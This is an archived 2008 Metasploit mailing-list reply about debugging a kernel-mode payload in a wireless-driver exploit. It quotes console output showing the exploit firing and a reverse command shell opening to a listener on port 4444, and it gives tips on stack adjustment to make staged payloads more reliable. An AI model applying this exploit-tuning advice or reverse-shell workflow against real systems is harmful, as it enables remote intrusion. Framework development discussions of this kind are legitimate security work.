Metasploit mailing list archives

Mistake in kernel mode payloads


From: mmiller at hick.org (Matt Miller)
Date: Tue, 11 Mar 2008 13:45:53 -0700

On Tue, Mar 11, 2008 at 08:43:41PM +0100, Giuseppe Gottardi wrote:
On Wed, Feb 27, 2008 at 1:34 AM,  <mmiller at hick.org> wrote:
 What is EXITFUNC set to when you run your exploit?  In general, the
 stager assumes that the user-mode payload will take care of cleanup.
 Currently, this typically involves a call to ExitProcess, ExitThread, or
 generating an exception (depending on EXITFUNC).  If your EXITFUNC is
 set to seh this will likely cause lsass to crash in the manner that
 you're seeing.


msf exploit(intel_2200BG_probe) > rexploit
[*] Started reverse handler
[*] Sending probe exploit to 00:0e:35:95:7b:45...
[-] 
#################################################################################################################[*]
Sending stage (474 bytes)
[*] Command shell session 2 opened (192.168.33.212:4444 -> 192.168.33.159:1085)
#
[*] Completed sending probe.

(lsass.exe dies)

The most likely reason for this has to do with available stack space for
the stager.  Try setting 'StackAdjustment' => -3500 in your 'Payload'
information hash (take a look at windows/smb/ms06_040_netapi for an
example).  In general, if you use a staged payload and receive a
connection but the process crashes, it may be indicative of the stager
attempting to read more data than is available on the stack (leading to
the call to recv failing and the process crashing).  We have thought
about making StackAdjustment default for Windows exploits and may do
that in the future.  The other wifi driver exploits most likely need to
have this added as well for reliability.
